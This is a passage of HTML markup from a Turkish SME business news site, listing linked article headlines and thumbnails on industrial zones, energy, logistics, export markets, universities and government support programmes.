<b>“Müşterilerinin karşısında değil, daima yanındadır” mottosuyla hareket eden ajans; CRM Medya</b></a>
</div>
</div></div><div class="katelement kat_k2">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/ikitelli-organize-sanayi-bolgesi-yonetim-kurulu-baskan-vekili-saban-gulbahar-h6010.html" title="İkitelli Organize Sanayi Bölgesi Yönetim Kurulu Başkan Vekili Şaban Gülbahar"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ikitelli_organize_sanayi_bolgesi_yonetim_kurulu_baskan_vekili_saban_gulbahar_h6010_92941.png" alt="İkitelli Organize Sanayi Bölgesi Yönetim Kurulu Başkan Vekili Şaban Gülbahar" />
<b>İkitelli Organize Sanayi Bölgesi Yönetim Kurulu Başkan Vekili Şaban Gülbahar</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osbden-haber/gebze-guzeller-osb-ve-okan-universitesinden-isbirligi-h6030.html" title="Gebze Güzeller OSB ve Okan Üniversitesinden işbirliği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gebze_guzeller_osb_ve_okan_universitesinden_isbirligi_h6030_65c34.png" alt="Gebze Güzeller OSB ve Okan Üniversitesinden işbirliği" />
<b>Gebze Güzeller OSB ve Okan Üniversitesi’nden işbirliği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osbden-haber/cosb-hastane-baraj-ve-universite-yapacak-h6031.html" title="ÇOSB, hastane, baraj ve üniversite yapacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cosb_hastane_baraj_ve_universite_yapacak_h6031_acf7b.png" alt="ÇOSB, hastane, baraj ve üniversite yapacak" />
<b>ÇOSB, hastane, baraj ve üniversite yapacak</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osbden-haber/turk-girisimcisine-abd-kapisi-h6032.html" title="Türk girişimcisine ABD kapısı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_girisimcisine_abd_kapisi_h6032_5723a.png" alt="Türk girişimcisine ABD kapısı" />
<b>Türk girişimcisine ABD kapısı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osbden-haber/antalya-osb-yuzde18-buyume-diyor-h6034.html" title="Antalya OSB, yüzde18 büyüme diyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/antalya_osb_yuzde18_buyume_diyor_h6034_c4599.png" alt="Antalya OSB, yüzde18 büyüme diyor" />
<b>Antalya OSB, yüzde18 büyüme diyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osbden-haber/kadin-istihdami-ve-osbler-h6035.html" title="Kadın istihdamı ve OSBler"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kadin_istihdami_ve_osbler_h6035_25461.png" alt="Kadın istihdamı ve OSBler" />
<b>Kadın istihdamı ve OSB’ler</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/osbden-haber/tum-zorluklara-ragmen-buyuyorlarturkiye-ekonomisine-yon-veren-osbler-h5930.html" title="Tüm zorluklara rağmen büyüyorlar;Türkiye Ekonomisine Yön Veren OSBler”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tum_zorluklara_ragmen_buyuyorlarturkiye_ekonomisine_yon_veren_osbler_h5930_c467c.png" alt="Tüm zorluklara rağmen büyüyorlar;Türkiye Ekonomisine Yön Veren OSBler”" />
<b>Tüm zorluklara rağmen büyüyorlar;“Türkiye Ekonomisine Yön Veren OSB’ler”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osb-tanitim/cerkezkoy-osb-yonetim-kurulu-baskani-eyup-sozdinler-cosb-turkiyenin-yildizidir-h5846.html" title="Çerkezköy OSB Yönetim Kurulu Başkanı Eyüp Sözdinler: ÇOSB, Türkiyenin yıldızıdır"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cerkezkoy_organize_sanayi_bolgesi_h5846_b2f97.png" alt="Çerkezköy OSB Yönetim Kurulu Başkanı Eyüp Sözdinler: ÇOSB, Türkiyenin yıldızıdır" />
<b>Çerkezköy OSB Yönetim Kurulu Başkanı Eyüp Sözdinler: ÇOSB, Türkiye’nin yıldızıdır</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/osbden-haber/turkiye-henkel-icin-onemli-bir-uretim-merkezi-h5892.html" title="Türkiye Henkel için önemli bir üretim merkezi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_henkel_icin_onemli_bir_uretim_merkezi_h5892_ece42.png" alt="Türkiye Henkel için önemli bir üretim merkezi" />
<b>Türkiye Henkel için önemli bir üretim merkezi</b></a>
</div>
</div></div><div class="katelement kat_k3">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/otomasyon/otomasyon-ve-endustri-40-h6022.html" title="Otomasyon ve Endüstri 4.0"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_icin_gelismisligin_anahtari_otomasyon_ve_endustri_40_h6022_2d749.png" alt="Otomasyon ve Endüstri 4.0" />
<b>Otomasyon ve Endüstri 4.0</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/schneider-electric-enerjiye-erisim-programi-ile-1-milyon-gence-ulasacak-h6020.html" title="Schneider Electric, ‘Enerjiye Erişim Programı ile 1 milyon gence ulaşacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/schneider_electric_enerjiye_erisim_programi_ile_1_milyon_gence_ulasacak_h6020_45c76.png" alt="Schneider Electric, ‘Enerjiye Erişim Programı ile 1 milyon gence ulaşacak" />
<b>Schneider Electric, ‘Enerjiye Erişim Programı’ ile 1 milyon gence ulaşacak</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/mitsubishi-electric-enerji-tasarrufu-haftasina-dikkat-cekti-h6021.html" title="Mitsubishi Electric, Enerji Tasarrufu Haftasına dikkat çekti"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mitsubishi_electric_enerji_tasarrufu_haftasina_dikkat_cekti_h6021_66ac0.png" alt="Mitsubishi Electric, Enerji Tasarrufu Haftasına dikkat çekti" />
<b>Mitsubishi Electric, Enerji Tasarrufu Haftası’na dikkat çekti</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/enerji/arcelik-asye-enerji-verimliginde-birincilik-odulu-h6023.html" title="Arçelik A.Ş.ye enerji verimliğinde birincilik ödülü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/arcelik_asye_enerji_verimliginde_birincilik_odulu_h6023_156e3.png" alt="Arçelik A.Ş.ye enerji verimliğinde birincilik ödülü" />
<b>Arçelik A.Ş.’ye enerji verimliğinde birincilik ödülü</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/aydem-ve-gediz-elektrikten-80-tl-uzeri-faturalara-indirim-h6024.html" title="Aydem ve Gediz Elektrikten 80 TL üzeri faturalara indirim"><img src="http://www.kobi-efor.com.tr/images/haberler/" alt="Aydem ve Gediz Elektrikten 80 TL üzeri faturalara indirim" />
<b>Aydem ve Gediz Elektrik’ten 80 TL üzeri faturalara indirim</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/2017de-lojistik-sektorune-dair-beklentiler-yuksek-h6025.html" title="2017de lojistik sektörüne dair beklentiler yüksek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/2017de_lojistik_sektorune_dair_beklentiler_yuksek_h6025_cafbc.png" alt="2017de lojistik sektörüne dair beklentiler yüksek" />
<b>2017’de lojistik sektörüne dair beklentiler yüksek</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/lojistik/mars-logistics-ve-man-isbirligine-imza-atti-h6027.html" title="Mars Logistics ve MAN işbirliğine imza attı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mars_logistics_ve_man_isbirligine_imza_atti_h6027_4701d.png" alt="Mars Logistics ve MAN işbirliğine imza attı" />
<b>Mars Logistics ve MAN işbirliğine imza attı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/avisten-kis-lastigi-kampanyasi-h6028.html" title="Avisten kış lastiği kampanyası"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/avisten_kis_lastigi_kampanyasi_h6028_1d6e9.png" alt="Avisten kış lastiği kampanyası" />
<b>Avis’ten kış lastiği kampanyası</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/yurtici-kargo-cocuklar-gulsun-diye-tasiyacak-h6029.html" title="Yurtiçi Kargo ‘Çocuklar Gülsün Diye taşıyacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yurtici_kargo_cocuklar_gulsun_diye_tasiyacak_h6029_937ef.png" alt="Yurtiçi Kargo ‘Çocuklar Gülsün Diye taşıyacak" />
<b>Yurtiçi Kargo ‘Çocuklar Gülsün Diye’ taşıyacak</b></a>
</div>
</div></div><div class="katelement kat_k5">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/stratejik-pazarlama-ve-yatirim-raporu-dikkat-iran-h6026.html" title="Stratejik pazarlama ve yatırım raporu DİKKAT, İRAN!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/stratejik_pazarlama_ve_yatirim_raporu_dikkat_iran_h6026_5a6eb.png" alt="Stratejik pazarlama ve yatırım raporu DİKKAT, İRAN!" />
<b>Stratejik pazarlama ve yatırım raporu DİKKAT, İRAN!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/mal-ve-isbirligi-talepleri/uluslararasi-ticaret-ve-isbirligi-teklifleri-h6064.html" title="Uluslararası Ticaret ve İşbirliği Teklifleri"><img src="http://www.kobi-efor.com.tr/images/haberler/" alt="Uluslararası Ticaret ve İşbirliği Teklifleri" />
<b>Uluslararası Ticaret ve İşbirliği Teklifleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/en-buyuk-en-genis-en-derin-turkiyenin-10-ihracat-kapisi-h5984.html" title="En büyük, en geniş, en derin… Türkiyenin 10 ihracat kapısı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/en_buyuk_en_genis_en_derin_turkiyenin_10_ihracat_kapisi_h5984_3d13c.png" alt="En büyük, en geniş, en derin… Türkiyenin 10 ihracat kapısı" />
<b>En büyük, en geniş, en derin… Türkiye’nin 10 ihracat kapısı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-vizyonuna-giren-pazar-hindistan-h5861.html" title="Türkiyenin vizyonuna giren pazar; HİNDİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_vizyonuna_giren_pazar_hindistan_h5861_d1b2f.png" alt="Türkiyenin vizyonuna giren pazar; HİNDİSTAN" />
<b>Türkiye’nin vizyonuna giren pazar; HİNDİSTAN</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/dunyanin-en-hizli-buyuyen-kita-ekonomisi-gideni-buyuten-afrika-h5775.html" title="Dünyanın en hızlı büyüyen kıta ekonomisi, gideni büyüten AFRİKA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dunyanin_en_hizli_buyuyen_kita_ekonomisi_gideni_buyuten_afrika_h5775_90ad2.png" alt="Dünyanın en hızlı büyüyen kıta ekonomisi, gideni büyüten AFRİKA" />
<b>Dünyanın en hızlı büyüyen kıta ekonomisi, gideni büyüten AFRİKA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/girisimcimiz-icin-yuksek-rekabetci-bir-pazar-katar-h5652.html" title="Girişimcimiz için yüksek rekabetçi bir Pazar KATAR"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/girisimcimiz_icin_yuksek_rekabetci_bir_pazar_katar_h5652_f10e9.png" alt="Girişimcimiz için yüksek rekabetçi bir Pazar KATAR" />
<b>Girişimcimiz için yüksek rekabetçi bir Pazar KATAR</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-uretici-sektorleri-icin-hedef-pazarkazakistan-h5587.html" title="Türkiyenin üretici sektörleri için hedef pazar;KAZAKİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_uretici_sektorleri_icin_hedef_pazarkazakistan_h5587_41f5c.png" alt="Türkiyenin üretici sektörleri için hedef pazar;KAZAKİSTAN" />
<b>Türkiye’nin üretici sektörleri için hedef pazar;KAZAKİSTAN</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/21-yuzyilin-ekonomik-dopingi-rusya-h5505.html" title="21. yüzyılın ekonomik dopingi RUSYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/21_yuzyilin_ekonomik_dopingi_rusya_h5505_1968f.png" alt="21. yüzyılın ekonomik dopingi RUSYA" />
<b>21. yüzyılın ekonomik dopingi RUSYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/kobilerimiz-kuzey-afrikada-kolay-tutunur-cezayir-tunus-fas-h5441.html" title="KOBİlerimiz Kuzey Afrikada kolay tutunur: CEZAYİR-TUNUS-FAS"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilerimiz_kuzey_afrikada_kolay_tutunur_cezayir_tunus_fas_h5441_c69ec.png" alt="KOBİlerimiz Kuzey Afrikada kolay tutunur: CEZAYİR-TUNUS-FAS" />
<b>KOBİ’lerimiz Kuzey Afrika’da kolay tutunur: CEZAYİR-TUNUS-FAS</b></a>
</div>
</div></div><div class="katelement kat_k44">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/universite/yeni-kusak-universite-isik-h6037.html" title="Yeni kuşak üniversite: IŞIK"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yeni_kusak_universite_isik_h6037_cc0b4.png" alt="Yeni kuşak üniversite: IŞIK" />
<b>Yeni kuşak üniversite: IŞIK</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/utikad-ve-beykoz-universitesi-sektorun-nabzini-tutacak-h6036.html" title="UTİKAD ve Beykoz Üniversitesi sektörün nabzını tutacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/utikad_ve_beykoz_universitesi_sektorun_nabzini_tutacak_h6036_e7fcb.png" alt="UTİKAD ve Beykoz Üniversitesi sektörün nabzını tutacak" />
<b>UTİKAD ve Beykoz Üniversitesi sektörün nabzını tutacak</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/universiteliler-arasi-100yasam-kalitesi-yarismasi-basliyor-h6038.html" title="Üniversiteliler Arası %100Yaşam Kalitesi Yarışması” başlıyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/universiteliler_arasi_100yasam_kalitesi_yarismasi_basliyor_h6038_ab421.png" alt="Üniversiteliler Arası %100Yaşam Kalitesi Yarışması” başlıyor" />
<b>“Üniversiteliler Arası %100Yaşam Kalitesi Yarışması” başlıyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/ak-gidadan-muhendislere-yurtdisinda-egitim-firsati-h6039.html" title="Ak Gıdadan mühendislere yurtdışında eğitim fırsatı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ak_gidadan_muhendislere_yurtdisinda_egitim_firsati_h6039_2c016.png" alt="Ak Gıdadan mühendislere yurtdışında eğitim fırsatı" />
<b>Ak Gıda’dan mühendislere yurtdışında eğitim fırsatı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/ieis-ile-ankara-universitesi-isbirligi-h6041.html" title="İEİS ile Ankara Üniversitesi işbirliği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ieis_ile_ankara_universitesi_isbirligi_h6041_c1985.png" alt="İEİS ile Ankara Üniversitesi işbirliği" />
<b>İEİS ile Ankara Üniversitesi işbirliği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/universite-sanayi-isbirliginin-yukselen-yildizlari-vakif-universiteleri-h5926.html" title="‘Üniversite-Sanayi İşbirliğinin yükselen yıldızları: Vakıf Üniversiteleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/universite_sanayi_isbirliginin_yukselen_yildizlari_vakif_universiteleri_h5926_4f998.png" alt="‘Üniversite-Sanayi İşbirliğinin yükselen yıldızları: Vakıf Üniversiteleri" />
<b>‘Üniversite-Sanayi İşbirliği’nin yükselen yıldızları: Vakıf Üniversiteleri</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/universite/koc-universitesi-rahmi-m-koc-bilim-madalyasi-profdr-aydogan-ozcanin-oldu-h5985.html" title="Koç Üniversitesi Rahmi M. Koç Bilim Madalyası Prof.Dr. Aydoğan Özcanın oldu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/koc_universitesi_rahmi_m_koc_bilim_madalyasi_profdr_aydogan_ozcanin_oldu_h5985_fb0e9.png" alt="Koç Üniversitesi Rahmi M. Koç Bilim Madalyası Prof.Dr. Aydoğan Özcanın oldu" />
<b>Koç Üniversitesi Rahmi M. Koç Bilim Madalyası Prof.Dr. Aydoğan Özcan’ın oldu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/universite/bayiler-sertifikalandiriliyor-h5986.html" title="Bayiler sertifikalandırılıyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bayiler_sertifikalandiriliyor_h5986_d9d1c.png" alt="Bayiler sertifikalandırılıyor" />
<b>Bayiler sertifikalandırılıyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/universite/akcansanin-biyocesitlilik-proje-yarismasinin-kazananlari-aciklandi-h5987.html" title="Akçansanın Biyoçeşitlilik Proje Yarışmasının kazananları açıklandı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/akcansanin_biyocesitlilik_proje_yarismasinin_kazananlari_aciklandi_h5987_8e90b.png" alt="Akçansanın Biyoçeşitlilik Proje Yarışmasının kazananları açıklandı" />
<b>Akçansa’nın Biyoçeşitlilik Proje Yarışması’nın kazananları açıklandı</b></a>
</div>
</div></div><div class="katelement kat_k45">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/ekonomi-bakanligi-proje-bazli-yatirim-destegi-h6048.html" title="Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomi_bakanligi_proje_bazli_yatirim_destegi_h6048_12143.png" alt="Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği" />
<b>Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/abden-teknoloji-destekleri-h5935.html" title="ABden teknoloji destekleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/abden_teknoloji_destekleri_h5935_597e4.png" alt="ABden teknoloji destekleri" />
<b>AB’den teknoloji destekleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-tesvik-programlari-h5753.html" title="Destek-Teşvik Programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_tesvik_programlari_h5753_1d66b.png" alt="Destek-Teşvik Programları" />
<b>Destek-Teşvik Programları</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/calisma-hayatinda-sosyal-diyalogun-artirilmasi-h5657.html" title="Çalışma hayatında sosyal diyaloğun artırılması"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/calisma_hayatinda_sosyal_diyalogun_artirilmasi_h5657_8c1bb.png" alt="Çalışma hayatında sosyal diyaloğun artırılması" />
<b>Çalışma hayatında sosyal diyaloğun artırılması</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/surekli-basvuruya-acik-destek-programlari-h5595.html" title="Sürekli başvuruya açık destek programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/surekli_basvuruya_acik_destek_programlari_h5595_a9439.png" alt="Sürekli başvuruya açık destek programları" />
<b>Sürekli başvuruya açık destek programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/nitelige-destekler-h5509.html" title="NİTELİĞE DESTEKLER"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/nitelige_destekler_h5509_afef7.png" alt="NİTELİĞE DESTEKLER" />
<b>NİTELİĞE DESTEKLER</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/dogru-bilgiye-erisim-turkiyede-kobiler-artik-h5442.html" title="Doğru Bilgiye Erişim Türkiyede KOBİler artık"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dogru_bilgiye_erisim_turkiyede_kobiler_artik_h5442_ac5cd.png" alt="Doğru Bilgiye Erişim Türkiyede KOBİler artık" />
<b>Doğru Bilgiye Erişim Türkiye’de KOBİ’ler artık</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/isbirligi-yap-destegi-kap-h5356.html" title="İşbirliği yap desteği kap"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/isbirligi_yap_destegi_kap_h5356_7f33b.png" alt="İşbirliği yap desteği kap" />
<b>İşbirliği yap desteği kap</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/dogu-akdeniz-kalkinma-ajansi-hatay-kahramanmaras-osmaniye-2016-yili-teklif-cagrilari-h5271.html" title="DOĞU AKDENİZ KALKINMA AJANSI (Hatay, Kahramanmaraş, Osmaniye)   2016 Yılı Teklif Çağrıları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dogu_akdeniz_kalkinma_ajansi_hatay_kahramanmaras_osmaniye_2016_yili_teklif_cagrilari_h5271_59198.png" alt="DOĞU AKDENİZ KALKINMA AJANSI (Hatay, Kahramanmaraş, Osmaniye)   2016 Yılı Teklif Çağrıları" />
<b>DOĞU AKDENİZ KALKINMA AJANSI (Hatay, Kahramanmaraş, Osmaniye)   2016 Yılı Teklif Çağrıları</b></a>
</div>
</div></div><div class="katelement kat_k47">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/turk-telekom-ismek-ile-birlikte-telekomunikasyon-satis-danismani-yetistirecek-h6043.html" title="‘Türk Telekom, İSMEK ile birlikte ‘Telekomünikasyon Satış Danışmanı yetiştirecek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_telekom_ismek_ile_birlikte_telekomunikasyon_satis_danismani_yetistirecek_h6043_f14b4.png" alt="‘Türk Telekom, İSMEK ile birlikte ‘Telekomünikasyon Satış Danışmanı yetiştirecek" />
<b>‘Türk Telekom, İSMEK ile birlikte ‘Telekomünikasyon Satış Danışmanı’ yetiştirecek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/yeni-hayata-bir-merhaba-h6045.html" title="Yeni Hayata Bir Merhaba”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yeni_hayata_bir_merhaba_h6045_8b3e3.png" alt="Yeni Hayata Bir Merhaba”" />
<b>“Yeni Hayata Bir Merhaba”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/huawei-tev-isbirligiyle-teknolojiye-daha-fazla-kadin-eli-degdirecek-h6046.html" title="Huawei, TEV işbirliğiyle teknolojiye daha fazla kadın eli değdirecek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/huawei_tev_isbirligiyle_teknolojiye_daha_fazla_kadin_eli_degdirecek_h6046_d0c7e.png" alt="Huawei, TEV işbirliğiyle teknolojiye daha fazla kadın eli değdirecek" />
<b>Huawei, TEV işbirliğiyle teknolojiye daha fazla kadın eli değdirecek</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/turnalar-hep-ucsun-projesi-3yilini-tamamladi-h6047.html" title="‘Turnalar Hep Uçsun projesi 3.yılını tamamladı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turnalar_hep_ucsun_projesi_3yilini_tamamladi_h6047_b01a5.png" alt="‘Turnalar Hep Uçsun projesi 3.yılını tamamladı" />
<b>‘Turnalar Hep Uçsun’ projesi 3.yılını tamamladı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/lenovo-her-eve-akliyla-girecek-h6053.html" title="Lenovo her eve aklıyla girecek!"><img src="http://www.kobi-efor.com.tr/images/haberler/" alt="Lenovo her eve aklıyla girecek!" />
<b>Lenovo her eve aklıyla girecek!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/hayata-konfor-sunan-teknoloji-thea-iq-dokunmatik-yasam-bicimi-h6050.html" title="Hayata konfor sunan teknoloji: Thea IQ dokunmatik yaşam biçimi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hayata_konfor_sunan_teknoloji_thea_iq_dokunmatik_yasam_bicimi_h6050_726b6.png" alt="Hayata konfor sunan teknoloji: Thea IQ dokunmatik yaşam biçimi" />
<b>Hayata konfor sunan teknoloji: Thea IQ dokunmatik yaşam biçimi</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/dayanikli-ve-guclu-kone-transys-yuk-asansoru-h6051.html" title="Dayanıklı ve güçlü; KONE TranSys™ Yük Asansörü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dayanikli_ve_guclu_kone_transys_yuk_asansoru_h6051_ca52f.png" alt="Dayanıklı ve güçlü; KONE TranSys™ Yük Asansörü" />
<b>Dayanıklı ve güçlü; KONE TranSys™ Yük Asansörü</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/somfy-ile-dis-cephe-jaluzileri-motorlu-yasam-alanlari-konforlu-h6052.html" title="Somfy ile dış cephe jaluzileri motorlu, yaşam alanları konforlu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/somfy_ile_dis_cephe_jaluzileri_motorlu_yasam_alanlari_konforlu_h6052_dcaf4.png" alt="Somfy ile dış cephe jaluzileri motorlu, yaşam alanları konforlu" />
<b>Somfy ile dış cephe jaluzileri motorlu, yaşam alanları konforlu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/uzun-ve-saglikli-omrun-9-sirri-h6060.html" title="Uzun ve sağlıklı ömrün 9 sırrı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uzun_ve_saglikli_omrun_9_sirri_h6060_aee13.png" alt="Uzun ve sağlıklı ömrün 9 sırrı" />
<b>Uzun ve sağlıklı ömrün 9 sırrı</b></a>
</div>
</div></div><div class="katelement kat_k46">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/dogu-kalkinmasi-icin-start-verildi-cazibe-merkezleri-h6007.html" title="Doğu kalkınması için start verildi; Cazibe Merkezleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dogu_kalkinmasi_icin_start_verildi_cazibe_merkezleri_h6007_c0ebf.png" alt="Doğu kalkınması için start verildi; Cazibe Merkezleri" />
<b>Doğu kalkınması için start verildi; Cazibe Merkezleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/bursada-kobilere-ve-girisimcilere-finansal-cozumler-h6009.html" title="Bursada KOBİlere ve girişimcilere finansal çözümler"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/bursada_kobilere_ve_girisimcilere_finansal_cozumler_h6009_f3036.png" alt="Bursada KOBİlere ve girişimcilere finansal çözümler" />
<b>Bursa’da KOBİ’lere ve girişimcilere finansal çözümler</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/torba-yasa-ve-khklarla-gelen-ekonomi-h6011.html" title="Torba Yasa ve KHKlarla gelen ekonomi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/torba_yasa_ve_khklarla_gelen_ekonomi_h6011_693b5.png" alt="Torba Yasa ve KHKlarla gelen ekonomi" />
<b>Torba Yasa ve KHK’larla gelen ekonomi</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/musiad-baskani-nail-olpak-musiad-antitez-degil-tezdir-h6012.html" title="MÜSİAD Başkanı Nail Olpak: MÜSİAD antitez değil, tezdir"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/musiad_baskani_nail_olpak_musiad_antitez_degil_tezdir_h6012_d10da.png" alt="MÜSİAD Başkanı Nail Olpak: MÜSİAD antitez değil, tezdir" />
<b>MÜSİAD Başkanı Nail Olpak: MÜSİAD antitez değil, tezdir</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/dosya/dosyainsaat-sifir-enerji-icin-kentsel-donusum-buyuk-firsat-h6033.html" title="Dosya/İnşaat Sıfır enerji için kentsel dönüşüm büyük fırsat”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dosyainsaat_sifir_enerji_icin_kentsel_donusum_buyuk_firsat_h6033_b1667.png" alt="Dosya/İnşaat Sıfır enerji için kentsel dönüşüm büyük fırsat”" />
<b>Dosya/İnşaat “Sıfır enerji için kentsel dönüşüm büyük fırsat”</b></a>
</div>
<div>
